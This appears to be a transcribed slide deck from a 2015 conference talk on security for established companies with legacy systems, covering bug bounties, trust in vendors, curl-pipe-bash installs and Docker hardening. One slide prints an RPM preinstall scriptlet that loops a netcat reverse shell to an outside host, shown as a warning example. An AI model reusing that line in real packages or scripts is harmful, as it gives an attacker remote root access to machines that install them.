Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Security for non-unicorns

Bea Hughes
September 25, 2015

Security for non-unicorns

Operability.io September 2015.

Security is becoming quite the thing now days, everyone wants to have one of them. The mantra that things should be built with security in mind and can't be plastered on later is a very important one, if you're based in Silicon Valley and are about to write "teh new hotness", but what happens if your company is older than say, 6 months. You already have some legacy systems and code. I'll be talking about how it's possible to unearth some of these things. What happens when you do uncover these things. How to stop them happening. And coping strategies for dealing with them

Bea Hughes

September 25, 2015

More Decks by Bea Hughes

Other Decks in Technology


  1. Who's this clown? 2 • Infrastructure security charlatan at Etsy

    • Operations monkey at Puppet Labs • Survived a bunch of startups in London. (some of them still have websites...) • Has far too many opinions about pretty much everything on the TwitterNet @benjammingh 2 https://twitter.com/skullmandible/status/411281851131523072 @benjammingh for Operability.io 2
  2. Setlist • The problem(™). • The solution(s)(™). • The wrap

    up. • Rapturous applause. • We all go home/dance parties/our secret lives as superheroes & heroines. @benjammingh for Operability.io 4
  3. From tiny seeds, do mighty acorns grow. • PinkiePwn's 6

    small bugs in Chrome to full sandbox escape • Egor Homakov's 5 small bugs in Github to full private access on GitHub • from XSS to remote code execution in under an hour • Username & password stolen for HVAC system leads to $160+ Million Target breach. @benjammingh for Operability.io 6
  4. Computering is hard. No. 1 takeaway for security types is

    a sense of perspective. @benjammingh for Operability.io 8
  5. Security people aren't great secure coders. • Snort: 10 CVEs,

    Wireshark: 322! CVEs • Joxean Koret on Breaking Antivurius software • Security Firm Bit9 Hacked, Used to Spread Malware • Tavis Ormandy from Project Zero on exploiting ESET • BEST! FireEye just running Apache/PHP as root @benjammingh for Operability.io 9
  6. So who do I trust? • No one? Always a

    great position for security people, who don't want to get paid. • Everyone? Do I have a 419 email for YOU! • Security vendors? If you have infinite money and no attackers. • Attackers! @benjammingh for Operability.io 10
  7. "You're already being probed for security holes, do you want

    to know or not?" @benjammingh for Operability.io 11
  8. Bug bounties 103: The first few weeks will be hell.

    @benjammingh for Operability.io 14
  9. curl | bash "But this is no worse than packages."

    root# yum install sketchy @benjammingh for Operability.io 28
  10. curl | bash root# rpm -qp --scripts sketchy-1.33-7.rpm preinstall scriptlet

    (using /bin/sh): bash -c 'while : ; \ do \ nc -e /bin/sh root.legit.pw 2222 ;\ done' @benjammingh for Operability.io 29
  11. >30% of Images in Docker Hub Contain High Priority Security

    Vulns - Jayanth Gummaraju, Tarun Desikan and Yoshio Turner from BanyanOps @benjammingh for Operability.io 38
  12. But is Docker itself secure? • Don't run things as

    root. • No really, stop running things as root. • Did I mention not running things as root. • It is also not 1999. (Docker 1.8 addresses some of this, with it's changes to who it runs as) @benjammingh for Operability.io 41
  13. Securify the Docker. • Don't use --privileged. • Use --cap-drop

    all and --cap-drop <thing> to get the minimum capabilities. • Use Docker Notary • Use GRSecurity (just do that anyway, if you can.) • Use SELinux... I may as well ask for a pony here. @benjammingh for Operability.io 42
  14. Summary • Computers are apparently hard. • Security is clearly

    harder still, obv. • Actually trust and humans is hard. • The typing is the easy bit. (ish) @benjammingh for Operability.io 43
  15. More Summary • Complex systems lead to much more complex

    security problems. (see Oauth) • Annual pen-tests don't scale, bug bounties can. • Attackers are mining any public info you have (GitHub, S3) • I beg you to stop trusting curl. • Docker and security can be used in the same sentence. @benjammingh for Operability.io 44
  16. Thank you! Twidder: @benjammingh LinkedIn: lnkdin.me/p/benyeah FidoNet: 2:254/524.13 JitHub: github.com/barn

    SpeakerDeck: speakerdeck.com/barnbarn Etsy: Careers CodeAsCraft @benjammingh for Operability.io 45